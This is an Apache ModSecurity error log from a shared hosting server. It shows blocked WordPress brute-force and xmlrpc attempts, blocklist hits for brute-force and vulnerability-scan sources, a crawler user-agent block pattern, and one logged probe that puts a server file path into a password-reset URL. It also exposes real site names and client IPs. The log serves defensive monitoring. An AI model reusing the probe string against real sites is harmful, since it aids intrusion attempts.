[Tue May 26 14:17:37.947092 2026] [security2:error] [pid 598542:tid 598729] [client 202.141.30.10:65459] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeKf4iWyZxnXeAW3JbOgAAADk"]
[Tue May 26 14:17:37.947323 2026] [security2:error] [pid 598542:tid 598729] [client 202.141.30.10:65459] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeKf4iWyZxnXeAW3JbOgAAADk"]
[Tue May 26 14:17:38.304562 2026] [security2:error] [pid 598542:tid 598795] [client 114.119.133.30:53945] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "freshmindsolutions.com"] [uri "/contact-us"] [unique_id "ahVeKv4iWyZxnXeAW3JbSgAAAHs"], referer: https://freshmindsolutions.com/blog
[Tue May 26 14:17:38.505325 2026] [proxy:error] [pid 598542:tid 598797] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:17:38.505387 2026] [proxy_http:error] [pid 598542:tid 598797] [client 205.210.31.138:60654] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:17:38.506217 2026] [proxy:error] [pid 598542:tid 598797] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 14:17:38.506260 2026] [proxy_http:error] [pid 598542:tid 598797] [client 205.210.31.138:60654] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 14:17:38.687722 2026] [security2:error] [pid 598542:tid 598674] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeKv4iWyZxnXeAW3JbRgAAAAI"]
[Tue May 26 14:17:39.093380 2026] [security2:error] [pid 598542:tid 598678] [client 144.76.32.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeKv4iWyZxnXeAW3JbUgAAAAY"]
[Tue May 26 14:17:41.084546 2026] [security2:error] [pid 598542:tid 598746] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeLP4iWyZxnXeAW3JbrAAAAEo"]
[Tue May 26 14:17:41.812201 2026] [security2:error] [pid 598542:tid 598651] [remote 185.190.18.72:51096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.18.190.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVeLf4iWyZxnXeAW3Jb3AAAa2w"]
[Tue May 26 14:17:42.981946 2026] [security2:error] [pid 598542:tid 598759] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeLv4iWyZxnXeAW3Jb9wAAAFc"]
[Tue May 26 14:17:43.422554 2026] [security2:error] [pid 598542:tid 598584] [remote 178.156.182.155:59498] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 155.182.156.178.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVeL_4iWyZxnXeAW3JcFgAAcCk"]
[Tue May 26 14:17:43.918468 2026] [security2:error] [pid 598542:tid 598599] [remote 45.79.189.31:41306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 31.189.79.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVeL_4iWyZxnXeAW3JcIgAAZDg"]
[Tue May 26 14:17:44.786467 2026] [security2:error] [pid 598542:tid 598795] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeMP4iWyZxnXeAW3JcRQAAAHs"]
[Tue May 26 14:17:46.062544 2026] [security2:error] [pid 598542:tid 598755] [client 74.7.228.60:56994] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "bhavisharchitects.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVeMv4iWyZxnXeAW3JciQAAU0M"]
[Tue May 26 14:17:47.607053 2026] [security2:error] [pid 598542:tid 598749] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeM_4iWyZxnXeAW3JcuwAAAE0"]
[Tue May 26 14:17:48.080284 2026] [security2:error] [pid 598542:tid 598613] [remote 14.161.17.36:44364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVeM_4iWyZxnXeAW3Jc1QAAQkY"]
[Tue May 26 14:17:48.535955 2026] [security2:error] [pid 598542:tid 598761] [client 202.141.30.10:35578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeNP4iWyZxnXeAW3Jc5QAAAFk"]
[Tue May 26 14:17:48.536481 2026] [security2:error] [pid 598542:tid 598761] [client 202.141.30.10:35578] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeNP4iWyZxnXeAW3Jc5QAAAFk"]
[Tue May 26 14:17:49.756480 2026] [security2:error] [pid 598542:tid 598776] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeNf4iWyZxnXeAW3Jc9gAAAGg"]
[Tue May 26 14:17:49.894375 2026] [security2:error] [pid 598542:tid 598769] [client 14.247.224.210:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeNf4iWyZxnXeAW3Jc_wAAAGE"]
[Tue May 26 14:17:50.373414 2026] [security2:error] [pid 598542:tid 598775] [client 2a01:4ff:1f0:d28a::1:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVeNf4iWyZxnXeAW3JdCAAAZ1c"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 14:17:51.966499 2026] [security2:error] [pid 598542:tid 598709] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeN_4iWyZxnXeAW3JdLQAAACU"]
[Tue May 26 14:17:53.443093 2026] [security2:error] [pid 598542:tid 598752] [client 168.119.96.239:44628] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVeOf4iWyZxnXeAW3JdoQAAAFA"], referer: https://thegoodsporting.com
[Tue May 26 14:17:54.125125 2026] [security2:error] [pid 598542:tid 598716] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeOf4iWyZxnXeAW3JdsAAAACw"]
[Tue May 26 14:17:54.757743 2026] [security2:error] [pid 598542:tid 598685] [client 5.230.57.10:46512] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "communedediende.azurmediatec.com"] [uri "/index.php"] [unique_id "ahVeOf4iWyZxnXeAW3JdtwAAAA0"]
[Tue May 26 14:17:54.814805 2026] [security2:error] [pid 598542:tid 598697] [client 114.119.152.167:58731] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVeOv4iWyZxnXeAW3Jd1gAAABk"], referer: http://haddingtonwines.com/cart?remove_item=feade1d2047977cd0cefdafc40175a99
[Tue May 26 14:17:54.898165 2026] [security2:error] [pid 598542:tid 598592] [remote 216.73.216.240:17229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 240.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVeOv4iWyZxnXeAW3Jd2QAAHzE"]
[Tue May 26 14:17:55.851999 2026] [security2:error] [pid 598542:tid 598578] [remote 35.233.46.64:32388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 64.46.233.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahVeO_4iWyZxnXeAW3Jd6gAAIyM"]
[Tue May 26 14:17:56.381107 2026] [security2:error] [pid 598542:tid 598696] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeO_4iWyZxnXeAW3Jd9gAAABg"]
[Tue May 26 14:17:56.718287 2026] [security2:error] [pid 598542:tid 598723] [client 85.208.96.199:23270] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-10-14/day/2023-08-29/"] [unique_id "ahVePP4iWyZxnXeAW3JeAwAAADM"]
[Tue May 26 14:17:56.718489 2026] [security2:error] [pid 598542:tid 598723] [client 85.208.96.199:23270] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-10-14/day/2023-08-29/"] [unique_id "ahVePP4iWyZxnXeAW3JeAwAAADM"]
[Tue May 26 14:17:57.960598 2026] [security2:error] [pid 598542:tid 598704] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVePf4iWyZxnXeAW3JeHgAAACA"]
[Tue May 26 14:17:58.544508 2026] [security2:error] [pid 598542:tid 598727] [client 5.230.57.10:46522] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "communedediende.azurmediatec.com"] [uri "/index.php"] [unique_id "ahVePv4iWyZxnXeAW3JeQgAAADc"]
[Tue May 26 14:17:59.357694 2026] [security2:error] [pid 598542:tid 598772] [client 202.141.30.10:35416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeP_4iWyZxnXeAW3JeXwAAAGQ"]
[Tue May 26 14:17:59.358310 2026] [security2:error] [pid 598542:tid 598772] [client 202.141.30.10:35416] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeP_4iWyZxnXeAW3JeXwAAAGQ"]
[Tue May 26 14:18:00.690049 2026] [security2:error] [pid 598542:tid 598676] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeQP4iWyZxnXeAW3JedwAAAAQ"]
[Tue May 26 14:18:03.300214 2026] [security2:error] [pid 598542:tid 598721] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeQv4iWyZxnXeAW3JeuwAAADE"]
[Tue May 26 14:18:05.171016 2026] [security2:error] [pid 598542:tid 598774] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeRP4iWyZxnXeAW3JfJAAAAGY"]
[Tue May 26 14:18:05.488327 2026] [security2:error] [pid 598542:tid 598660] [remote 51.68.87.127:61298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.87.68.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVeRf4iWyZxnXeAW3JfMQAACXU"]
[Tue May 26 14:18:06.683499 2026] [security2:error] [pid 598542:tid 598685] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeRv4iWyZxnXeAW3JfSgAAAA0"]
[Tue May 26 14:18:09.611941 2026] [security2:error] [pid 598542:tid 598722] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeSf4iWyZxnXeAW3JfmAAAADI"]
[Tue May 26 14:18:10.496921 2026] [security2:error] [pid 598542:tid 598705] [client 202.141.30.10:65329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeSv4iWyZxnXeAW3JfwQAAACE"]
[Tue May 26 14:18:10.497105 2026] [security2:error] [pid 598542:tid 598705] [client 202.141.30.10:65329] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeSv4iWyZxnXeAW3JfwQAAACE"]
[Tue May 26 14:18:11.298414 2026] [security2:error] [pid 598542:tid 598717] [client 2.135.170.248:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVeSv4iWyZxnXeAW3JftgAAAC0"], referer: https://www.anujtradingco.com/
[Tue May 26 14:18:11.813260 2026] [security2:error] [pid 598542:tid 598715] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeS_4iWyZxnXeAW3Jf3AAAACs"]
[Tue May 26 14:18:12.473716 2026] [security2:error] [pid 598542:tid 598789] [client 2.135.170.248:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVeTP4iWyZxnXeAW3JgFgAAAHU"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1240922&moderation-hash=b6bc1f01f28e4a82cbe368d699a016af
[Tue May 26 14:18:13.580565 2026] [security2:error] [pid 598542:tid 598697] [client 222.253.174.236:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeTf4iWyZxnXeAW3JgMwAAABk"]
[Tue May 26 14:18:13.985209 2026] [security2:error] [pid 598542:tid 598724] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeTf4iWyZxnXeAW3JgRQAAADQ"]
[Tue May 26 14:18:14.510231 2026] [security2:error] [pid 598542:tid 598720] [client 114.119.156.129:60333] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "amdsi.org.in"] [uri "/robots.txt"] [unique_id "ahVeTv4iWyZxnXeAW3JgYAAAADA"]
[Tue May 26 14:18:16.130843 2026] [security2:error] [pid 598542:tid 598780] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeT_4iWyZxnXeAW3JggAAAAGw"]
[Tue May 26 14:18:18.361524 2026] [security2:error] [pid 598542:tid 598728] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeUf4iWyZxnXeAW3JguwAAADg"]
[Tue May 26 14:18:18.954967 2026] [security2:error] [pid 598542:tid 598703] [client 31.57.184.107:55329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-login.php"] [unique_id "ahVeUv4iWyZxnXeAW3Jg2QAAAB8"], referer: https://www.google.com/search?q=wordpress
[Tue May 26 14:18:19.370835 2026] [security2:error] [pid 598542:tid 598697] [client 31.57.184.107:56029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wp-login.php"] [unique_id "ahVeU_4iWyZxnXeAW3Jg6gAAABk"]
[Tue May 26 14:18:19.586431 2026] [security2:error] [pid 598542:tid 598611] [remote 74.7.241.58:58364] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVeU_4iWyZxnXeAW3Jg8wAAZkQ"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/the-events-calendar/common/src/Common/Site_Health/Fields
[Tue May 26 14:18:19.847296 2026] [security2:error] [pid 598542:tid 598595] [remote 103.95.119.103:60066] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVeU_4iWyZxnXeAW3Jg-QAAPDQ"]
[Tue May 26 14:18:20.493179 2026] [security2:error] [pid 598542:tid 598784] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeVP4iWyZxnXeAW3JhEAAAAHA"]
[Tue May 26 14:18:21.304621 2026] [security2:error] [pid 598542:tid 598755] [client 202.141.30.10:35474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeVf4iWyZxnXeAW3JhOgAAAFM"]
[Tue May 26 14:18:21.305151 2026] [security2:error] [pid 598542:tid 598755] [client 202.141.30.10:35474] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVeVf4iWyZxnXeAW3JhOgAAAFM"]
[Tue May 26 14:18:22.312469 2026] [security2:error] [pid 598542:tid 598695] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeVf4iWyZxnXeAW3JhUgAAABc"]
[Tue May 26 14:18:25.018000 2026] [security2:error] [pid 598542:tid 598774] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeWP4iWyZxnXeAW3JhrAAAAGY"]
[Tue May 26 14:18:27.350724 2026] [security2:error] [pid 598542:tid 598795] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVeWv4iWyZxnXeAW3Jh3gAAAHs"]
[Tue May 26 14:18:27.665801 2026] [security2:error] [pid 598542:tid 598758] [client 167.160.69.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVeW_4iWyZxnXeAW3Jh6wAAAFY"], referer: https://www.anujtradingco.com/
[Tue May 26 14:18:29.298143 2026] [security2:error] [pid 598542:tid 598680] [client 167.160.69.203:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVeXf4iWyZxnXeAW3JiGQAAAAg"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1235007&moderation-hash=562a867a51a18e9f1eeb401257b769a8
